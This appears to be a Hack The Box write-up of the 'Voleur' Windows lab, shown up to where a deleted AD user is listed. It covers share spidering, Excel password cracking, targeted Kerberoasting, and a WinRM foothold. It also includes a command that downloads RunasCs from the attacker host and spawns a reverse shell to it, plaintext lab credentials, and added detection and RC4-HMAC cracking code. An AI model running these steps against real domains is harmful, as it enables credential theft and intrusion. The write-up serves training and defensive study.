Hackthebox: Voleur

Foued SAIDI

Overview

Voleur is a medium-difficulty Windows machine from Hack The Box, played as an assumed breach with a low-privileged domain account. The chain: pull a password-protected Excel file from an SMB share → crack it → targeted Kerberoast of the accounts we can write to → WinRM as svc_winrm → restore a deleted AD user (Restore_Users group) → decrypt his DPAPI credential blob → grab the backups (ntds.dit + SYSTEM) over SSH into WSL → dump the hashes → TGT from the Administrator NT hash (overpass-the-hash) → root.

Voleur-info-card

Reconnaissance

PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-10 17:27:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 13s
| smb2-time:
| date: 2025-07-10T17:29:05
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Kerberos (88), LDAP (389/3268), kpasswd (464) and SMB (445) mark this as the domain controller for voleur.htb. The odd one out is OpenSSH for Ubuntu on 2222, which hints at a Linux environment (WSL) living on the same host; it matters later. Note also the NTLM:False in the NetExec banners below: NTLM authentication is disabled on this DC, so every tool has to authenticate with Kerberos (-k in nxc, a ccache for Impacket and evil-winrm), which in turn means dc.voleur.htb must resolve and the realm must be configured in /etc/krb5.conf.
First thing, I ran an RID brute-force to enumerate every domain principal by SID (including accounts that ordinary LDAP lookups may not show):

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb dc.voleur.htb -k -d voleur.htb --rid-brute
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc 498: VOLEUR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB dc.voleur.htb 445 dc 500: VOLEUR\Administrator (SidTypeUser)
SMB dc.voleur.htb 445 dc 501: VOLEUR\Guest (SidTypeUser)
SMB dc.voleur.htb 445 dc 502: VOLEUR\krbtgt (SidTypeUser)
SMB dc.voleur.htb 445 dc 512: VOLEUR\Domain Admins (SidTypeGroup)
SMB dc.voleur.htb 445 dc 513: VOLEUR\Domain Users (SidTypeGroup)
SMB dc.voleur.htb 445 dc 514: VOLEUR\Domain Guests (SidTypeGroup)
SMB dc.voleur.htb 445 dc 515: VOLEUR\Domain Computers (SidTypeGroup)
SMB dc.voleur.htb 445 dc 516: VOLEUR\Domain Controllers (SidTypeGroup)
SMB dc.voleur.htb 445 dc 517: VOLEUR\Cert Publishers (SidTypeAlias)
SMB dc.voleur.htb 445 dc 518: VOLEUR\Schema Admins (SidTypeGroup)
SMB dc.voleur.htb 445 dc 519: VOLEUR\Enterprise Admins (SidTypeGroup)
SMB dc.voleur.htb 445 dc 520: VOLEUR\Group Policy Creator Owners (SidTypeGroup)
SMB dc.voleur.htb 445 dc 521: VOLEUR\Read-only Domain Controllers (SidTypeGroup)
SMB dc.voleur.htb 445 dc 522: VOLEUR\Cloneable Domain Controllers (SidTypeGroup)
SMB dc.voleur.htb 445 dc 525: VOLEUR\Protected Users (SidTypeGroup)
SMB dc.voleur.htb 445 dc 526: VOLEUR\Key Admins (SidTypeGroup)
SMB dc.voleur.htb 445 dc 527: VOLEUR\Enterprise Key Admins (SidTypeGroup)
SMB dc.voleur.htb 445 dc 553: VOLEUR\RAS and IAS Servers (SidTypeAlias)
SMB dc.voleur.htb 445 dc 571: VOLEUR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB dc.voleur.htb 445 dc 572: VOLEUR\Denied RODC Password Replication Group (SidTypeAlias)
SMB dc.voleur.htb 445 dc 1000: VOLEUR\DC$ (SidTypeUser)
SMB dc.voleur.htb 445 dc 1101: VOLEUR\DnsAdmins (SidTypeAlias)
SMB dc.voleur.htb 445 dc 1102: VOLEUR\DnsUpdateProxy (SidTypeGroup)
SMB dc.voleur.htb 445 dc 1103: VOLEUR\ryan.naylor (SidTypeUser)
SMB dc.voleur.htb 445 dc 1104: VOLEUR\marie.bryant (SidTypeUser)
SMB dc.voleur.htb 445 dc 1105: VOLEUR\lacey.miller (SidTypeUser)
SMB dc.voleur.htb 445 dc 1106: VOLEUR\svc_ldap (SidTypeUser)
SMB dc.voleur.htb 445 dc 1107: VOLEUR\svc_backup (SidTypeUser)
SMB dc.voleur.htb 445 dc 1108: VOLEUR\svc_iis (SidTypeUser)
SMB dc.voleur.htb 445 dc 1109: VOLEUR\jeremy.combs (SidTypeUser)
SMB dc.voleur.htb 445 dc 1112: VOLEUR\First-Line Technicians (SidTypeGroup)
SMB dc.voleur.htb 445 dc 1113: VOLEUR\Second-Line Technicians (SidTypeGroup)
SMB dc.voleur.htb 445 dc 1114: VOLEUR\Third-Line Technicians (SidTypeGroup)
SMB dc.voleur.htb 445 dc 1601: VOLEUR\svc_winrm (SidTypeUser)
SMB dc.voleur.htb 445 dc 1602: VOLEUR\Restore_Users (SidTypeGroup)

I then used the credentials provided with the box (ryan.naylor) to collect BloodHound data:

┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-python -c All -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -ns 10.10.11.76 --zip
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
INFO: Done in 02M 17S
INFO: Compressing output into 20250710132820_bloodhound.zip

Next, NetExec's spider_plus module lists the shares ryan.naylor can read and downloads their files (DOWNLOAD_FLAG=True; files above the default MAX_FILE_SIZE of 50 KB are skipped). Finance and HR are not readable by this user, IT is:

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k -M spider_plus -o DOWNLOAD_FLAG=True
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SPIDER_PLUS dc.voleur.htb 445 dc [*] Started module spidering_plus with the following options:
SPIDER_PLUS dc.voleur.htb 445 dc [*] DOWNLOAD_FLAG: True
SPIDER_PLUS dc.voleur.htb 445 dc [*] STATS_FLAG: True
SPIDER_PLUS dc.voleur.htb 445 dc [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS dc.voleur.htb 445 dc [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS dc.voleur.htb 445 dc [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS dc.voleur.htb 445 dc [*] OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
SPIDER_PLUS dc.voleur.htb 445 dc [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json".
SPIDER_PLUS dc.voleur.htb 445 dc [*] SMB Shares: 8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb 445 dc [*] SMB Readable Shares: 4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb 445 dc [*] SMB Filtered Shares: 1
SPIDER_PLUS dc.voleur.htb 445 dc [*] Total folders found: 27
SPIDER_PLUS dc.voleur.htb 445 dc [*] Total files found: 7
SPIDER_PLUS dc.voleur.htb 445 dc [*] File size average: 3.55 KB
SPIDER_PLUS dc.voleur.htb 445 dc [*] File size min: 22 B
SPIDER_PLUS dc.voleur.htb 445 dc [*] File size max: 16.5 KB
SPIDER_PLUS dc.voleur.htb 445 dc [*] File unique exts: 5 (inf, ini, pol, xlsx, csv)
SPIDER_PLUS dc.voleur.htb 445 dc [*] Downloads successful: 7
SPIDER_PLUS dc.voleur.htb 445 dc [+] All files processed successfully.

Among the downloads is IT\First-Line Support\Access_Review.xlsx, a password-protected workbook. office2john extracts its hash and john cracks it with rockyou. Note the cost: an Office 2013 hash runs 100000 iterations, so we only get a few hundred guesses per second on four threads, and a weak password is what makes this feasible:

┌──(kali㉿kali)-[~/…/nxc_spider_plus/dc.voleur.htb/IT/First-Line Support]
└─$ office2john Access_Review.xlsx > hash.xslx

┌──(kali㉿kali)-[~/…/nxc_spider_plus/dc.voleur.htb/IT/First-Line Support]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.xslx
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:02 DONE (2025-07-10 13:45) 0.3759g/s 294.7p/s 294.7c/s 294.7C/s football1..lolita
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Excel file

The workbook is an access review that lists account names next to plaintext passwords; the svc_ldap password used next (and Todd Wolfe's, used later) comes from it.
Let's use svc_ldap for a targeted Kerberoast. targetedKerberoast walks the user accounts that svc_ldap has write access to, temporarily sets a servicePrincipalName on each, requests an RC4 (etype 23) service ticket for it, prints the $krb5tgs$23$ hash and removes the SPN again. Here that works against lacey.miller and svc_winrm:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'voleur.htb' --dc-host dc.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (lacey.miller)
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$a24aca83fd617c6ffc7d9884128db09a$…
[VERBOSE] SPN removed successfully for (lacey.miller)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$9a331e767c9e6482b00a459019f0d3c4$d1bb120cef34c0a8d7c50f7823ac96284067fd49bcea95ceb4f44eb4dc0e90d31ea112fa6f60087d4a37277f48b796c637f90f8f3cc2b0d86d108472773a1fe328a389dedb2a91257829fb682e0a328ebaac4d3e6ab4506f8e0e5a95fa164d371742a7fc6d316d22b5e304f13a7463df6e771a66fd377a6169b00cd4e65f0095ec2b0b459693d2e82967652176103d9716592267241316bbda691c7f9e92c4f54430b4fb9665e534d383d6ffa186622869383559395fb655065c6b0b8999e91d95f01cccaa1c65ac9117c28bbf1402f14e65adc015620ef76b5069967c77d8c9370d8ac316c16fe0d93ce0b862249d43f91a339a9a5f690424316c4e7c7adfc4695a4e1d36b6cf7ac993ba1f33baff59cb9f0a2800b2bed43d2c4c9ed32f89ecb051b16d999ef02bd30750066a2a3b91b1a9b206c72fb630dedf84bdb2bdae7c4b3b06d655208617c211ee6c3a279d2e94bfd9bb2df219394ef163957f86e03edf7f1df5ea2c33a357907c8ff6332c34566512e26c70a7a32cbb9424892056ad3ffbfd7129e69f8878f49d36191f8123cf71009f71fedfadfe9760183824046fa6c952aaf97571f8b9ff1683fb4a41d9020b5f90e28991641e776756f8de2bd1d5901382dc042097d411b3ab9dadfa7e8b7b2b646f91869b8616ab088ed2fe8522e7ed490c287be4576a8ae2525f2218b37b2f64c258628c884f32220e4659e4ab58ea79b5072e01f49aaec535382728dc69e688acb25adbe44bba40218e325d7b7fdd22904a0ec6d1d967fba92c83bc273032931c3937f870ca6ffb3e30d8a674a712d8f8c5eb2e8292474eb424136091590fe8bb1fec45862fcc0cc975b4be580df384df54913cfcc88b0d4dc3e158f68cd3641a2f338e69d86e70c86e8138dfcac86eea44494e9527df3e88f54216c0cf7e080ada504bf28105d4b73c72ac745ae720be32eef6672e5c4077c4d97325405d0d65d2697e0156c82b38e1d517046f6d23e74122be4be67c5232b89795c2937a7aaec260aa8f89f36e0a9f50a84300f05169c22356a78ac995c4c8b8ca4232e74a1787c011272c60f5aaf94d6e33f965d766fe8a258315a647a0b93f8446eb04ca06beffdea80817345cfb81334aac9f2a447932456d9d2bf3533c81ad9d9cd94f9cd653afe4215750aa0b7f23f3c0a4ab93166ace6ad2a719e39a3be1c81b92950d9e1d500e4b7dbbc9819ee7e54f2465b5d1103ea7184a9c7b6ff8fadd5876d798ea16a140f2064e1b8befdf6f364dfa67c5ccf1740b039694661b87655f051ae9d6facc5fc796acdde9591c9c8cd07f908253bffd171137f02a7e402d914846198765f20514728
01caf08c53dc6523ea113133fa6bb0662ccc595ebf47b1e3aa39049ba8acc5791e5cd6d1e5158ad4eaff1201714b2cd1a8304c1c58e810c353103ee3e28b8445470732e42265075f98cd805fb736da2a0f1d6ef0709ff7b
[VERBOSE] SPN removed successfully for (svc_winrm)
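From the defender's side this sequence is noisy: a write to servicePrincipalName, an RC4 service ticket request by the same principal for a user account, and the SPN disappearing again seconds later. As an added example (constructed here, not part of the original writeup), the following Python shows the correlation a SIEM rule would do over Windows Security events 5136 (directory object modified) and 4769 (Kerberos service ticket requested). The event records are constructed dicts that mimic the parsed event fields; 5136 only fires if object-level auditing (a SACL) is enabled on the user objects, which this example assumes.

```python
"""Correlation rule for a targeted Kerberoast: SPN written -> RC4 TGS requested by the same
principal -> SPN removed, all within a short window. Added example, not part of the writeup.
Events are constructed dicts mimicking parsed Windows Security events 5136 and 4769."""
from datetime import datetime, timedelta

SPN_ADDED, SPN_DELETED = "%%14674", "%%14675"   # 5136 OperationType: value added / value deleted
RC4_HMAC = "0x17"                                # 4769 TicketEncryptionType for RC4-HMAC (etype 23)

# Constructed sample, mirroring the step above: svc_ldap sets an SPN on lacey.miller, requests
# an RC4 service ticket for it, then deletes the SPN. Two benign events are mixed in.
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2025-07-10T17:40:00", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=Lacey Miller,OU=Staff,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "abcd/lacey.miller", "OperationType": SPN_ADDED},
    {"EventID": 4769, "TimeCreated": "2025-07-10T17:40:02", "TargetUserName": "svc_ldap@VOLEUR.HTB",
     "ServiceName": "lacey.miller", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 5136, "TimeCreated": "2025-07-10T17:40:03", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=Lacey Miller,OU=Staff,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "abcd/lacey.miller", "OperationType": SPN_DELETED},
    # Benign: a workstation requests an AES ticket for the DC's computer account.
    {"EventID": 4769, "TimeCreated": "2025-07-10T17:41:00", "TargetUserName": "WS01$@VOLEUR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
    # Benign: an admin registers a real SPN and leaves it in place.
    {"EventID": 5136, "TimeCreated": "2025-07-10T17:45:00", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=svc_iis,OU=Service Accounts,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/web.voleur.htb", "OperationType": SPN_ADDED},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def _sam(upn):
    return upn.split("@", 1)[0]


def rc4_user_tgs_requests(events):
    """4769s with RC4 for a service that is a user account (not a $-suffixed computer, not krbtgt).
    Each is a Kerberoast candidate on its own: a DC with AES-only accounts should rarely issue these."""
    return [e for e in events
            if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
            and not e["ServiceName"].endswith("$") and e["ServiceName"].lower() != "krbtgt"]


def targeted_kerberoast_alerts(events, window=timedelta(minutes=10)):
    """One alert per SPN add that is followed, within `window`, by an RC4 user-TGS request from the
    same principal that wrote the SPN and by the deletion of that same SPN value."""
    spn_writes = [e for e in events
                  if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "servicePrincipalName"]
    roasts = rc4_user_tgs_requests(events)
    alerts = []
    for add in (e for e in spn_writes if e["OperationType"] == SPN_ADDED):
        t0 = _ts(add)
        in_window = lambda e: t0 <= _ts(e) <= t0 + window
        roast = [r for r in roasts if _sam(r["TargetUserName"]) == add["SubjectUserName"] and in_window(r)]
        removal = [d for d in spn_writes
                   if d["OperationType"] == SPN_DELETED and d["ObjectDN"] == add["ObjectDN"]
                   and d["AttributeValue"] == add["AttributeValue"] and in_window(d)]
        if roast and removal:
            alerts.append({"actor": add["SubjectUserName"], "target": add["ObjectDN"],
                           "spn": add["AttributeValue"], "roasted_service": roast[0]["ServiceName"],
                           "spn_lifetime_s": (_ts(removal[0]) - t0).total_seconds()})
    return alerts


if __name__ == "__main__":
    for a in targeted_kerberoast_alerts(SAMPLE_EVENTS):
        print(f"[ALERT] {a['actor']} roasted {a['roasted_service']} via temporary SPN {a['spn']} "
              f"on {a['target']} (SPN lived {a['spn_lifetime_s']:.0f}s)")
```

The RC4 filter alone (rc4_user_tgs_requests) already catches any Kerberoast on a domain where service accounts are AES-only; the three-event correlation is what separates targetedKerberoast from a plain roast of pre-existing SPNs, and the short SPN lifetime is the tell.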

Two hashes come out. The svc_winrm one cracks in seconds with rockyou. Note the rate, about 3.3 million guesses per second against roughly 295 for the Office file: an etype-23 ticket is protected by an unsalted, single-round RC4-HMAC key derived straight from the NT hash, so there is no work factor to slow a cracker down:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ echo '$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$9a331e767c9e6482b00a459019f0d3c4$…' > winrm.hash

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt winrm.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)
1g 0:00:00:03 DONE (2025-07-10 13:53) 0.2915g/s 3344Kp/s 3344Kc/s 3344KC/s AHANACK6978012..AFITA4162
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
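To make the speed difference concrete, here is what the cracker does for every guess on an etype-23 hash, as an added example written for this page (not code from the writeup, john or targetedKerberoast): derive the NT hash (MD4 over the UTF-16LE password), derive K1 = HMAC-MD5(NT, key usage 2), derive the RC4 key from K1 and the ticket checksum, decrypt, and compare the HMAC-MD5 of the plaintext with the checksum (RFC 4757). MD4 and RC4 are implemented inline because hashlib builds on OpenSSL 3 often have MD4 disabled. The sample hash line is constructed locally with a made-up account and password and a fixed confounder; the ticket body is a placeholder string, not real ASN.1.

```python
"""Per-guess check for a $krb5tgs$23$ (RC4-HMAC, etype 23) Kerberoast hash, RFC 4757 style.
Added example, not code from the writeup, john or targetedKerberoast. MD4 and RC4 are inlined
because hashlib on OpenSSL 3 frequently has MD4 disabled. The sample hash is constructed below."""
import hashlib
import hmac
import struct

TGS_TICKET_USAGE = 2  # key usage for the EncTicketPart of a TGS-REP (what Kerberoast cracks)


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (little-endian words, 3 rounds of 16 steps)."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((56 - (len(data) + 1) % 64) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):
            a = _lrot((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _lrot((a + G(b, c, d) + X[R2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _lrot((a + H(b, c, d) + X[R3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = [(p + q) & 0xFFFFFFFF for p, q in zip((a0, b0, c0, d0), (a, b, c, d))]
    return struct.pack("<4I", a0, b0, c0, d0)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is simply the NT hash: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption as the KDC does it: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_verify(key: bytes, usage: int, blob: bytes) -> bool:
    """What a cracker does per guess: derive K1 and K3, decrypt, compare the HMAC with the checksum."""
    checksum, edata = blob[:16], blob[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, data), checksum)


def parse_krb5tgs23(line: str):
    """Split '$krb5tgs$23$*user$REALM$spn*$checksum$edata' into the identity and the raw blob."""
    prefix = "$krb5tgs$23$*"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 krb5tgs hash")
    ident, _, rest = line[len(prefix):].partition("*$")
    checksum_hex, _, edata_hex = rest.partition("$")
    return ident, bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)


def crack_krb5tgs23(line: str, wordlist):
    """Return the first wordlist entry whose NT hash decrypts the ticket, or None."""
    _, blob = parse_krb5tgs23(line)
    for guess in wordlist:
        if rc4_hmac_verify(nt_hash(guess), TGS_TICKET_USAGE, blob):
            return guess
    return None


def make_sample_hash(password, user, realm, spn, ticket_plain, confounder=bytes(range(8))):
    """Build a hash line the way the KDC + tool would; fixed confounder only for reproducibility."""
    blob = rc4_hmac_encrypt(nt_hash(password), TGS_TICKET_USAGE, ticket_plain, confounder)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


# Constructed sample: made-up account and password, placeholder ticket body.
SAMPLE_HASH = make_sample_hash("Winter2025!", "svc_demo", "VOLEUR.HTB", "voleur.htb/svc_demo",
                               b"stand-in for the ASN.1 EncTicketPart of a real TGS")
SAMPLE_WORDLIST = ["football1", "Summer2024", "Winter2025!", "AFITA4162"]
```

Per guess this is one MD4, three HMAC-MD5s and one RC4 pass over the ticket, with no salt and no iteration count, which is why john reports millions of guesses per second here and a few hundred for the 100000-iteration Office hash. The fix is on the account side: long random passwords (or gMSAs) for anything with an SPN, and AES-only msDS-SupportedEncryptionTypes so the KDC never issues an etype-23 ticket for those accounts in the first place.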

svc_winrm's password gives us a WinRM login. Because NTLM is disabled on the DC, evil-winrm cannot simply take the password (that would be an NTLM logon); instead request a TGT with getTGT.py, point KRB5CCNAME at the ccache and connect with Kerberos (-r realm, which needs a working /etc/krb5.conf), then read the user flag:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ getTGT.py voleur.htb/'svc_winrm':'AFireInsidedeOzarctica980219afi' -dc-ip dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_winrm.ccache

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ export KRB5CCNAME=svc_winrm.ccache
┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc_winrm\desktop> cat user.txt
f28cf8c8fc8f586ddbda4eb728467e34

Privilege Escalation - ACL abuse

The BloodHound data shows that svc_ldap is a member of the RESTORE_USERS group, which has GenericAll over lacey.miller. The group name also suggests the right to restore deleted AD objects, and that is the path that pays off below:

Bloodhound

Let's first switch to svc_ldap with RunasCs (password from the spreadsheet), spawning a PowerShell reverse shell back to our listener on port 4444:

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> iwr 10.10.16.11/RunasCs.exe -outfile r.exe;./r.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.16.11:4444
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1e701f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5320 created in background.

┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.76] 59234
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\svc_ldap
PS C:\Windows\system32>

With the ActiveDirectory module on the DC we can list deleted objects; one of them is a user, Todd Wolfe. Restore-ADObject brings him back (restoring a deleted object needs the Reanimate Tombstones control access right, presumably what the Restore_Users membership provides). Since the password from the spreadsheet still works afterwards, the object came back with its attributes intact, i.e. the AD Recycle Bin is enabled rather than a bare tombstone:

PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects


Deleted : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8

Deleted : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db



